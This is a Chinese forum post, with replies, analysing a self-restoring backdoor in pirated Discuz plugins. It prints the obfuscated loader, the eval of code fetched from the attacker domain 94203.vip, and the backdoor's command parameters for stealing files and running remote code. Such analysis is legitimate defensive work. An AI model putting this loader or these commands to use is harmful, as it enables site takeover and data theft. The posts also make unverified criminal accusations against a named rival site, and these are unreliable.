您所在的位置:首页 站务管理区 『公告|事务|指南|合作』 您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你 ...

[论坛事务] 您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析

[复制链接]

97

主题

1654

帖子

920

积分

网站编辑

金币:388 枚

热心:126

钻石:945 颗

复活卡:2 张

QQ
发表于 2020-3-17 20:06:04 | 显示全部楼层 |阅读模式
在曝光这个后门木马之前,我们考虑了很久要不要曝光,这个后门我们去年就已经发现了,而且第一时间公布到群里面!在群里的用户可能很早都知道这个后门!
但是始终没有曝光在网站内!原因是从这个后门的复杂程度来看,此人不简单!我们不想惹!并不是我们怕!明着来我们不怕什么
但是自从和魔趣吧打过交道,我们已经对背地里使坏的人有点惧怕,古人说的好:明枪易躲,暗箭难防!唯女子与小人为难养也!

如果用一个词形容魔趣吧:网络水军,不知道大家看过《爱情公寓》最新一季没有!里面有一集就是讲网络水军的,他们擅于捏造各种谣言和不实言论
最简单的就是,他天天说这个骗子,那个骗子(总之得罪了他的都会被他在各网站称这个人是骗子),这些人骗他什么了呢?如果是骗他的钱了,他的付款截图呢?
反正我是从来没有收到过他付给我的钱!倒是我们付过钱给他(那时候他在源码哥打工做编辑的时候开的工资)!
如果不是骗钱,难道还有人骗了他的感情不成?骗了他的童子自身?

扯的有点远!还是回到主题:我们希望这个后门作者不是像魔趣吧这样的人!后门里面虽有 moqu8 字样。如果真是他,可能我们曝光了他,可能他接下来又会铺天盖地的对我们进行负面宣传。也有可能他会看了我这种结论。会选择平静,以摆脱嫌疑!总之无论后门作者是谁!在这里我们不讨论,也不深挖!只分析这个后门

正文开始:
这个后门样本是最早发现在飞*房产(后门和插件作者无关,正版的无此后门)

后来我们又在用户给我们提供的插件里面根据关键词 发现很多都带这个后门,那么下面我们开始分析:本次样本为 克*APP 3.51(后门和插件作者无关,正版的无此后门)因为距离第一次发现太久,那个样本没有了!

首先我们是在一个模板文件发现了异常(如图)
0397924a0047a451.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析1-来自源码哥ymg6.com
eval(dfsockopen($commen))

很明显的一句话后门。但是整个文件就这一行代码!没有一句话应有的参数!而 $commen 这个变量也并未在这个文件赋值,
全文件找了下发下在下面这个文件有 $commen  变量的赋值
function_comiis_load.php

1b6a64598a16b957.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析2-来自源码哥ymg6.com

但是这个值经过了一系列“混淆”,我们一步步来拨开这个烟雾弹
  1. $title=dfsockopen($url);
复制代码
这里有个远程请求!那么我们把这个 $url 变量调试出来,先把代码搬过来


3707e98902e5a77e.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析3-来自源码哥ymg6.com

调试得到$url 的值为:
://94203.vip/20190305.png

这里已经是个正常的链接了,我们获取这个文件的内容试试(也可以通过浏览器的下载功能直接下载这个图片,然后通过记事本打开) 9bd18e7e81629adf.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析4-来自源码哥ymg6.com
得到内容
da197c3fa08da693.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析5-来自源码哥ymg6.com
moqu8ctrlabcctrl://ctrl.ctrl/ctrl[A-Z_].*[A-Z_]ctrlecho "990";ctrl./config.phpctrl6692ctrlhttpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseofn`lpsck`xmlctrl`.*?`ctrl6692ctrlhttpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseoff`lpsck`xmlctrl./baiduin.phpctrltemplate/index.htmlctrlpic.png

注意这里有个moqu8 开头的字眼!我们不深究这个(因为不是重点),继续对这串不知道什么玩意的内容进行整理(直接搬后门的代码过来取值就是)
bdaf20248d156f57.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析6-来自源码哥ymg6.com

最后得到了 $commen 的值为:
http://94203.vip/baiduseofn.xml

继续往下调试,发现紧跟的这几段是让代码看起来像一个正常代码,其实并无实际用途!都是一些赋值然后其实并不会调用,也许后面会用到先放这里不做分析
list(,,, $tagid, $type,$page ) = func_get_args();
    $rewriterules=$_G['cache']['plugin']['comiis_app'];
        $identifier=substr($_GET['id'],0,strpos($_GET['id'], ':'))?substr($_GET['id'],0,strpos($_GET['id'], ':'))您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析7-来自源码哥ymg6.com_GET['id'];
        $plugin['identifier']=$plugin['identifier']?$plugin['identifier']您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析8-来自源码哥ymg6.comidentifier;

紧随其后的是,翻译出来看看是判断什么 然后调用了什么文件!
0ab47219c3c2de1f.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析9-来自源码哥ymg6.com

因为 $tag 前面已经取了这个的值,我们直接调用,打印出内容看看 140ab06e711ceed1.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析10-来自源码哥ymg6.com
得到一个数组
e994d5e52d9e0cf5.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析11-来自源码哥ymg6.com
内容如下
Array
(
    [0] => moqu8
    [1] => abc
    [2] => ://
    [3] => .
    [4] => /
    [5] => [A-Z_].*[A-Z_]
    [6] => echo "990";
    [7] => ./config.php
    [8] => 6692
    [9] => httpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseofn`lpsck`xml
    [10] => `.*?`
    [11] => 6692
    [12] => httpABc94203`akndecryptud^gjchdh`vipNULLB{NVJ:GJGbaiduseoff`lpsck`xml
    [13] => ./baiduin.php
    [14] => template/index.html
    [15] => pic.png
)
这样就很容易翻译那段代码的意思得到结果为:
if(@filesize('./config.php') != '6692'){
                @include_once DISCUZ_ROOT.'./source/plugin/comiis_app/'.'template/index.html';
        }
这句话翻译成大白话的意思就是  如果 ./config.php 文件的大小 不等于 6692 字节  则引用 template/index.html 这个文件
注意到了吗? template/index.html 这个文件正式我们一开始发现端倪的文件
现在插件是第一次运行,./config.php文件是不存在的 所以大小肯定是不等于 6692 的,所以我们继续调试!来到 template/index.html 这个文件
eval(dfsockopen($commen))
这句代码意思是 先读取远程链接返回的内容,然后执行!
$commen  这个变量的值我们前面已经知道了 就是下面的内容 (我们可以通过浏览器访问这个链接,然后右键查看源码,得到这个文件所返回的内容)
http://94203.vip/baiduseofn.xml
返回内容如下:
9ee413359bca435e.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析12-来自源码哥ymg6.com
也就是说 即将执行的代码就是这段代码,复制下来 调试一波,顺便美化一下,方便阅读
function content($svip)
{
    ini_set('max_execution_time', '0');
    if (function_exists('file_get_contents')) {
        $data = file_get_contents($svip);
    } else {
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $svip);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $data = curl_exec($ch);
        curl_close($ch);
    }
    return $data;
}
$svip = preg_replace(array("/" . $tag[10] . "/", "/" . $tag[1] . "/i", "/" . $tag[5] . "/"), array($tag[3], $tag[2], $tag[4]), $tag[12]);
if (content($svip)) {
    file_put_contents($tag[13], content($svip));
    require_once $tag[13];
}
因为代码中依然用到了 $tag 变量,所以我们继续放之前的调试文件调试,我们先来 取  $svip 这个变量对应的值,得到一个链接
http://94203.vip/baiduseoff.xml

之前我们已经打印了 $tag 的内容  可以得到  $tag[13] 的内容就是
./baiduin.php
继续放下调试 翻译出来的大白话意思就是
如果远程访问 上面的 的链接 返回的内容不是空的 则写入 返回的内容到文件 ../baiduin.php 并且马上引用这个文件
既然又要引用新文件,那么我们就得看看这个文件的内容了 (我们可以通过浏览器访问这个链接,然后右键查看源码,得到这个文件所返回的内容) 其实这里和前面一个步骤很像,
你也可以理解成是一层壳!得到一个比较大的文件了(如图),有种预感,马上要正式进入后门的领域了,前面一系列操作其实都是烟雾弹

view-source_94203.vip_baiduseoff.xml.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析13-来自源码哥ymg6.com
内容太长就不粘贴出来了
感兴趣的可以下载下面的附件(代码为了方便阅读,美化过,其实你也可以访问下面的链接得到这个文件样本)
您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析14-来自源码哥ymg6.com baiduseoff样本.zip (3.39 KB, 下载次数: 0)
其实这个文件是进行了简单加密的。我们给他解密!因为是比较简单的加密,而且我们这次的重点不是讲解加密与解密。下面直接上图解密,就不讲解了
5c1018e984de24e5.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析15-来自源码哥ymg6.com
得到新代码 也是加密了的
b7cc10d513434e45.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析16-来自源码哥ymg6.com
继续解密
be3e2dc9bdc96577.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析17-来自源码哥ymg6.com
得到解密后的文件
123.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析18-来自源码哥ymg6.com
我们调试这个文件,因为我不是 在dz环境调试的,但是这个文件用到了dz自带的几个函数 我们copy过来在调试
d2b3a2c27d43fbb1.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析19-来自源码哥ymg6.com
调试前先把已知的数据讲解下
db96550fc970e407.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析20-来自源码哥ymg6.com
如果文件./web.php 存在 就删除这个文件,前面的代码都是构造变量,在这句之前用不到
0cc6632aa55b986e.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析21-来自源码哥ymg6.com
这里的 $identifier 是插件的 标识,代码因为是在插件里面运行的,所以这个变量是dz赋值的$plugin['identifier'],比如我们现在的样本是 comiis_app
那么这个值就是  'comiis_app'
继续调试
e73690994c944fa6.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析22-来自源码哥ymg6.com
这里开始引用了上面的几个变量,我们把变量输出看看分别是什么
e2723697bf0a1639.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析23-来自源码哥ymg6.com
得到这2个变量分别是
46ca297a408977f2.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析24-来自源码哥ymg6.com
其实从这里开始感觉分析这个后门已经花了很长时间了,有点累,写的都比较随意了!可能大家都开始看不懂了,还是保持开始的状态继续写!分析起来其实很快,主要是要写,就慢了。
得到这2个变量的值,我们翻译下上面那段逻辑代码

如果 (文件./config.php不存在 远程请求http://94203.vip/index.txt的内容不是空) {

    远程访问("http://q.94203.vip/5r.php?u=你的域名&r=comiis_app";

    写入文件(./config.php, 远程访问http://94203.vip/index.txt返回的内容);

} 或者如果 (文件./config.php字节大小 不等于 6692 远程请求http://94203.vip/index.txt的内容不是空) {

    写入文件(./config.php, 远程访问http://94203.vip/index.txt返回的内容);

} 或者如果(文件"插件目录/log.txt"不存在   插件不是csdn123_newscsdn123com_toutiao) {

    远程访问("http://q.94203.vip/5r.php?u=你的域名&r=comiis_app";

    写入文件(插件目录/log.txt, 空的内容);


}


不知道这样的代码结构 对于不懂PHP的 能不能看懂,懂PHP的直接看源代码就可以。继续调试下面的代码
b3a80e8bbd1c3071.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析25-来自源码哥ymg6.com

首先输出这个变量 $deindex

3c2bafa3d9042db8.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析26-来自源码哥ymg6.com
得到 这个变量的值为 ./index.bak.php,我们继续用上面的方式翻译上面的这段逻辑代码
如果 (文件./index.bak.php存在) {
    删除文件./index.bak.php;
}
如果 (文件/source/function/function_ajax.php大小 不等于 14798) {
   如果(远程访问链接http://q.94203.vip/function_cloudaddons.xml返回的不是空内容 ){
        写到文件/source/function/function_ajax.php 内容是 远程访问链接http://q.94203.vip/function_cloudaddons.xml返回的内容
    }
}
删除文件./baiduin.php


到这里已经开始了 系统文件替换了,其实到这里基本上就结束了,看着是不是好像没有什么大问题?只是替换了一个系统文件和写了一个./config.php文件?
先别急着关闭页面,因为下面才是重头戏!我们继续分析写入的这2个文件
./config.php 开始,这个文件写入的是 http://94203.vip/index.txt 返回的内容 我们用浏览器打开
得到文件代码如图

94203.vip_index.txt.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析27-来自源码哥ymg6.com

去掉 用于混淆 让人觉得是正常文件的内容 得到代码
9b5debcb87ddd553.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析28-来自源码哥ymg6.com

为什么那一段是没用的?因为如果正常访问 其实这就是dz自带的 index.php文件复制过来的 后门控制者访问时如果在链接后面加了 ?s=1 就会执行图片上的代码

翻译出来的意思就是
执行代码(  远程请求 {域名}/baiduindex.xml 返回的内容 )
这里的域名 是通过GET参数获取,也就是说 如果控制住域名忘记续费 根本没有关系
比如 作者 通过这样的形式访问 你的域名/config.php?s=1&domain=94203.vip 就可以
那么/baiduindex.xml的内容是什么,因为是控制者在控制你网站时输入的,所以从代码上得不到这个文件!但是我们可以靠猜来试试,果然一猜就中,他用于木马的域名就文中提到的1个。试了一下 就出来了
94203.vip/baiduindex.xml
得到内容(加密了,那就解密看看这个是个什么文件吧)
203c83a3a0b49640.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析29-来自源码哥ymg6.com
经过4层解密,得到文件
9fed05a296d887ba.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析30-来自源码哥ymg6.com

这里已经有获取你网站安装的插件操作的代码的了!这个后门文件还有很多参数!等下我们继续分析!
解密后的样本和原版 在下面的附件 有兴趣的可以研究下
您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析31-来自源码哥ymg6.com config.php样本.zip (24.57 KB, 下载次数: 1)

下面继续分析,这个木马文件的所有参数(其实也累了,就不调试了,直接丢dz环境跑起来,然后把代码有的参数一个个输进去试)
忽然发现 404,原来作者还加了 指定浏览器功能,也就是说只有这个UA的浏览器才能访问,我们删除这段

cdfda1658c364324.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析32-来自源码哥ymg6.com

参数1、  你的域名/config.php?s=1&domain=94203.vip&b=header&z=压缩包名字
打包你网站 ./source/plugin  目录  即打包插件目录,然后下载,代码见下面
8062b0901c6d0c94.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析33-来自源码哥ymg6.com

参数2、  你的域名/config.php?s=2&domain=94203.vip
开头涉及到一个插件 aljjyno 不知道干嘛用的,但是只知道有写入文件的功能!也是远程请求,但是这次我们通过前面方法猜域名,没有猜出来!

3b451fe58b21605b.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析34-来自源码哥ymg6.com
紧随的是 替换/config/config_global.php 网站配置文件(给你开启开发者模式,这样你安装插件就不会自动删除安装包!不然作者每次打包走的都是没有xml的插件估计也很难受)
接着就是巩固一下后门
563e6f4dc2581982.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析35-来自源码哥ymg6.com
上面的代码前面讲过 就是判断 ./config.php的大小是不是 6692 如果不是就重新生成,防止木马被你清理或修改
然后 又巩固了一下 /source/function/function_ajax.php 的地位 这个文件前面提到了,但是还没有分析!等分析玩这个文件,我们继续分析这个
在往下 就是 获取你安装了的插件,然后列出列表吧?如果弄了打包的参数 就开始打包下载

参数3、  你的域名/config.php?s=3&domain=94203.vip后面还要参数 不是很重要
这个就是 下载压缩包用的,没什么可以讲解

参数4、  你的域名/config.php?s=4&domain=94203.vip
上传文件到你网站任意位置的好像。
e556f592143cdbc6.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析36-来自源码哥ymg6.com


参数5、  你的域名/config.php?s=5&domain=94203.vip&do=1 作用:写入文件

f1c617fbfd4ad36e.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析37-来自源码哥ymg6.com
如果带do参数 则写入94203.vip/data.xml 的内容
浏览器访问这个链接 得到的内容 是一个典型的PHP木马。打包网站用的,导出数据库啥的
如果没有带do参数 则写入94203.vip/datatwo.xml 的内容
浏览器访问这个链接 得到的内容 是一个文件在线管理功能。
2个样本在下面压缩包,感兴趣的可以下载看看
您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析38-来自源码哥ymg6.com 样本1.zip (36.57 KB, 下载次数: 0)

参数6、  你的域名/config.php?s=6&domain=94203.vip 作用:执行远程文件 94203.vip/ondata.xml
edcc5616d697bb58.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析39-来自源码哥ymg6.com

其实和 参数5的带do参数功能一样,可能是防止你服务器不能写入文件时  直接用php执行用的。应该算是备用功能,感兴趣的可以下载下面的附件研究
您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析40-来自源码哥ymg6.com ondata.zip (19.9 KB, 下载次数: 0)

参数7、  你的域名/config.php?s=7&domain=94203.vip 作用:下载你网站非压缩包文件(如直接下载PHP文件)
f16cc6c3ffbae980.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析41-来自源码哥ymg6.com

参数8、  你的域名/config.php?s=8&domain=94203.vip 作用:执行远程代码  94203.vip/tiquxml.xml

远程链接返回内容如下
@set_time_limit(0);
@include_once './config/config_global.php';
//
1f8518c50ec6ecf9.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析42-来自源码哥ymg6.com
从注释看好像是提取XML的

到这里 这个文件的功能基本上分析完毕。你以为就这样?以上涉及到的代码全部是远程执行,
代码后门作者可以随时更改/更新/升级、等于是给你网站的后门免费提供了免费更新的功能
如果他给你来个全盘格式化的远程代码,你懵逼吗?如果他给你来个清空数据库的代码 你懵逼吗?

分析到这里,我们回到前面提到的 /source/function/function_ajax.php文件
打开远程获取到的代码 分析一波,已经不记得前面有没有把这个文件的代码贴出来了!如果没有,感兴趣的同学就自己获取一下!

因为这个文件是基于dz的系统文件修改的(注入),我们对比文件删除dz原版代码 得到如下代码
40a044bb6fcf1a93.png您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析43-来自源码哥ymg6.com

也就是说上面的代码是后门作者加进去的

其实这个文件也没啥好分析的,大概就是:这个文件因为dz需要经常调用,调用频率非常的高

只要这个文件一被调用  就自动从远程获取内容94203.vip/index.xml 生成到文件/config.php

这个文件的代码前面分析过。大概想实现的目的就是防删!如果你删了,又会出来。就是你怎么删也删不掉/config.php这个文件,我给他定义为 “不死鸟”

基本上整个后门到这里就算分析完毕了!

其实目前来讲这套木马想查杀的话 有一套关键词可以进行匹配!
但是我们这次目的是分析木马!查杀的任务,还是得靠站长自己。或者付费联系我们

我们只能说这种木马在全网传播的很普遍!从各个资源站到某宝等 都有这个木马的影子!

最后安利一波:选择discuz相关的建站资源,选择源码哥是最安全的!如果给安全打分,官方安全系数第一,源码哥第二!

但是不得给dz盒子安利一波!(他们的安全系数也非常的高,因为他们号称是一手资源,官方原版)


如果您已经不幸中了木马。请自行查杀,或者付费联系我们(如果是我们老用户价钱好说)


最后:可能我们这篇文章发布出去之后,未来的一些日子可能会迎来DDOS和CC的轮流攻击!如果遇到访问慢,或者打不开,请相互告知!

评分

参与人数 1热心 +2 收起 理由
正在查找 + 2 好可怕 幸好我没下怎么多那个那个的插件和.

查看全部评分

回复 收藏

使用道具 举报

97

主题

1654

帖子

920

积分

网站编辑

金币:388 枚

热心:126

钻石:945 颗

复活卡:2 张

QQ
 楼主| 发表于 2020-3-17 20:11:27 | 显示全部楼层
希望大家看到觉得有用发给你正在使用盗版资源的朋友!让更多的人看到!
后续补充:截至发帖后到今天2020-5-28已经有一段时间了,首先,帖子里提到的 木马入口链接
94203.vip/20190305.png

已经404了,换地址了!也是这个入口里面含 moqu8  字眼!

于此同时,我们网站也受到魔趣吧全方位的虚假负面宣传,可谓是不打自招!请大家认清事实,认清魔趣吧嘴脸!

另外PhotoShop谁都会玩!别说聊天截图,Ae / Pr  / Edius 等视频剪辑制作软件玩的好, 假视频啥的都能给你做出来,此人除了打嘴炮还是打嘴炮!拿不出实际性的东西!比如这个帖子一样从头分析到尾他们所制作的木马后门

此人2011年搭建并运营成人用户网站,以卖充气娃娃为由进行诈骗(购买不发货)

直到2015年底!自营的小商城彻底被某宝替代!基本上很多人都在淘宝购买这类商品!于是此骗子的伎俩已经无法维持生计!

2016年初,在某平台直播诱骗小学生刷礼物(刷10块钱发私密照片为由)

2016年底应招加入源码哥,盗取大量资源后 自立门户!并对盗取的资源加入恶意后门达到控制用户网站的目的以偷去资源!

在此其中 该诈骗犯 还先后搭建了 ng编程网 等从事诈骗活动  

2018年搭建 zhongshenglicai.cn   hhzthg.com  moke8.org  等臭名昭著的 dz资源 诈骗和木马传播网站,但是玩建站的都不好骗,于是此类网站与2019年全部倒闭!

目前仅在保留 moke8.org  虚假资源网站 给  moqu8.com 导流,虽然这个站经过改版没有骗钱,但是骗流量也是诈骗的一种形式!








回复 收藏 支持 反对

使用道具 举报

0

主题

15

帖子

8

积分

1℃ode

金币:41 枚

热心:0

钻石:0 颗

复活卡:0 张

发表于 2020-3-20 22:21:41 | 显示全部楼层
顶你 您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析85-来自源码哥ymg6.com
回复 收藏 支持 反对

使用道具 举报

0

主题

14

帖子

7

积分

至尊VIP

金币:118 枚

热心:0

钻石:10 颗

复活卡:2 张

发表于 2020-3-28 04:12:18 | 显示全部楼层
您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析86-来自源码哥ymg6.com 老哥多更新点资源呀
回复 收藏 支持 反对

使用道具 举报

0

主题

17

帖子

9

积分

1℃ode

金币:18 枚

热心:0

钻石:0 颗

复活卡:0 张

发表于 2020-4-8 11:26:59 | 显示全部楼层
如何确定自己有没有中招,检查一下多少钱?
回复 收藏 支持 反对

使用道具 举报

0

主题

6

帖子

3

积分

1℃ode

金币:8 枚

热心:0

钻石:0 颗

复活卡:0 张

发表于 2020-4-10 20:11:39 | 显示全部楼层
魔趣吧 确实逗人恨!!
回复 收藏 支持 反对

使用道具 举报

0

主题

32

帖子

16

积分

1℃ode

金币:32 枚

热心:0

钻石:2 颗

复活卡:0 张

发表于 2020-4-17 23:46:44 | 显示全部楼层
难啊。。。。。。。。。
回复 收藏 支持 反对

使用道具 举报

0

主题

6

帖子

3

积分

1℃ode

金币:20 枚

热心:0

钻石:0 颗

复活卡:0 张

发表于 2020-5-27 10:04:47 | 显示全部楼层
源码哥好历害呀!
回复 收藏 支持 反对

使用道具 举报

1

主题

24

帖子

12

积分

1℃ode

金币:31 枚

热心:0

钻石:4 颗

复活卡:0 张

发表于 2020-5-27 23:06:15 | 显示全部楼层
这也太恐怖了吧您认为你的网站还很安全吗?风靡全网的DZ超级后门木马你了解过吗?速看源码哥如何分析87-来自源码哥ymg6.com
回复 收藏 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回列表

免责声明

源码哥所发布的一切破解应用及应用的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该应用,请支持正版,购买正版,得到更好的正版服务。(如有侵犯了您权益的应用请点此处联系我们处理

源码哥(ymg6.com) ( 浙ICP备16035663号-1 )
Processed in 0.198405 s, 64 queries  Archiver     
返回顶部 返回列表